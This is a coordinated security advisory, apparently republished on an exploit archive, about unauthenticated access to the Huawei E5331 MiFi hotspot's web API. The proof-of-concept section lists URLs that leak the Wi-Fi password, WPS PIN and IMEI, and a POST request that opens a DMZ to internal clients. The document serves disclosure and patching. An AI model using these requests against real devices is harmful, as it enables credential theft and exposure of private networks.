what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Huawei E5331 MiFi Unauthenticated Access / Setting Manipulation

Huawei E5331 MiFi Unauthenticated Access / Setting Manipulation
Posted Mar 7, 2014
Authored by Johannes Greil | Site sec-consult.com

Huawei E5331 MiFi mobile hotspot version 21.344.11.00.414 suffers from unauthenticated access and setting manipulation vulnerabilities.

tags | exploit, vulnerability
SHA-256 | cf66e5b0d1f8f702cc5cfd945ea173dc22ced7f2673c50573c15dd2f91677a87

Huawei E5331 MiFi Unauthenticated Access / Setting Manipulation

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20140307-0 >
=======================================================================
title: Unauthenticated access & manipulation of settings
product: Huawei E5331 MiFi mobile hotspot
vulnerable version: Software version 21.344.11.00.414
fixed version: Software version 21.344.27.00.414
impact: High
homepage: http://www.huawei.com
found: 2013-12-06
by: J. Greil
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Huawei E5331 Mobile WiFi is a high-speed packet access mobile hotspot. It is a
multi-mode wireless terminal for SOHO (Small Office and Home Office) and
business professionals.

You can connect the E5331 with the USB interface of a computer, or connect the
E5331 with the Wi-Fi. In the service area of the HSPA+/HSPA/UMTS/EDGE/GPRS/GSM
network, you can surf the Internet and send/receive messages/emails
cordlessly. The E5331 is fast, reliable, and easy to operate. Thus, mobile
users can experience many new features and services with the E5331. These
features and services will enable a large number of users to use the E5331 and
the average revenue per user (ARPU) of operators will increase substantially."

source:
http://www.huaweidevice.com/worldwide/productFeatures.do?pinfoId=3272&directoryId=5009&treeId=3619&tab=0


Business recommendation:
------------------------
All discovered vulnerabilities can be exploited without authentication and
therefore pose a high security risk.

The scope of the test, where the vulnerabilities have been identified, was a
very short crash-test of the device. It is assumed that further
vulnerabilities exist within this product!

The recommendation of SEC Consult is to perform follow-up security tests of
this device and similar devices.


Vulnerability overview/description:
-----------------------------------
Unauhenticated attackers are able to gain access to sensitive configuration
(e.g. WLAN passwords in clear text or IMEI information of the SIM card) and
even manipulate all settings in the web administration interface! This also
works when the "Enable firewall" feature is set in "Firewall Switch" settings
of the web interface.

This can even be exploited remotely via Internet depending on the mobile
operator setup. E.g. if the operator allows incoming connections for mobile
networks, the web interface would be accessible and exploitable publicly.

Otherwise those settings can be manipulated via CSRF attacks too. The DNS name
"mobilewifi.home" can be used regardless of the IP address settings.


Proof of concept:
-----------------
An attacker simply needs to access certain URLs of the web interface in order
to receive the configuration. No authentication is needed!

URL for retrieving wireless passwords / PSK in clear text:
http://mobilewifi.home/api/wlan/security-settings

XML response:
<?xml version="1.0" encoding="UTF-8"?>
<response>
<WifiAuthmode>WPA2-PSK</WifiAuthmode>
<WifiBasicencryptionmodes>NONE</WifiBasicencryptionmodes>
<WifiWpaencryptionmodes>AES</WifiWpaencryptionmodes>
<WifiWepKey1>12345</WifiWepKey1>
<WifiWepKey2>12345</WifiWepKey2>
<WifiWepKey3>12345</WifiWepKey3>
<WifiWepKey4>12345</WifiWepKey4>
<WifiWepKeyIndex>1</WifiWepKeyIndex>
<WifiWpapsk>XXXXX</WifiWpapsk>
<WifiWpsenbl>0</WifiWpsenbl>
<WifiWpscfg>1</WifiWpscfg>
<WifiRestart>1</WifiRestart>
</response>


Further interesting URLs to retrieve information from (not complete):
http://mobilewifi.home/api/wlan/wps (WPS pin)
http://mobilewifi.home/api/security/dmz (DMZ host settings)
http://mobilewifi.home/api/pin/simlock (enable SIM lock)
http://mobilewifi.home/api/wlan/host-list (connected wireless clients)
http://mobilewifi.home/api/device/information (IMEI, MAC, etc)
[...]


In order to change settings it is also simply possible to issue POST requests
to the specific URLs. E.g. change the "DMZ Settings" in order to make internal
clients (client IP addresses can be retrieved through the host-list from above)
reachable from the outside:

POST /api/security/dmz HTTP/1.1
Host: mobilewifi.home

<?xml version="1.0"
encoding="UTF-8"?><request><DmzStatus>1</DmzStatus><DmzIPAddress>A.B.C.D</DmzIPAddress></request>


All those requests can either be issued via CSRF or also from the Internet, if
the web interface of the device is reachable (depends on the mobile operator
settings).


Vulnerable / tested versions:
-----------------------------
The following version of the device has been tested which was the latest
version available at the time of identification of the flaw (the automatic
update feature did not supply any new version):

Software version: 21.344.11.00.414
Web UI version: 11.001.07.00.03


Vendor contact timeline:
------------------------
2013-12-11: Contacting vendor through psirt@huawei.com
2013-12-12: Reply from vendor
2013-12-18: Vendor requests some further details, sending answer
2014-01-09: Vendor: problem will be resolved in new firmware version
2014-01-14: Patch is planned for 6th March 2014
2014-03-07: SEC Consult releases coordinated security advisory


Solution:
---------
According to the vendor the following firmware release fixes the identified
problems:
* Software version 21.344.27.00.414

It contains the following improvements according to the vendor:
1. Users cannot obtain or set any device parameter without logging in.
2. Added server-side authentication to discard illegitimate packets.


The firmware can be downloaded from here:
http://consumer.huawei.com/en/support/downloads/index.htm

The item is called: E5331Update_21.344.27.00.414.B757


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com

EOF J. Greil / @2014
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close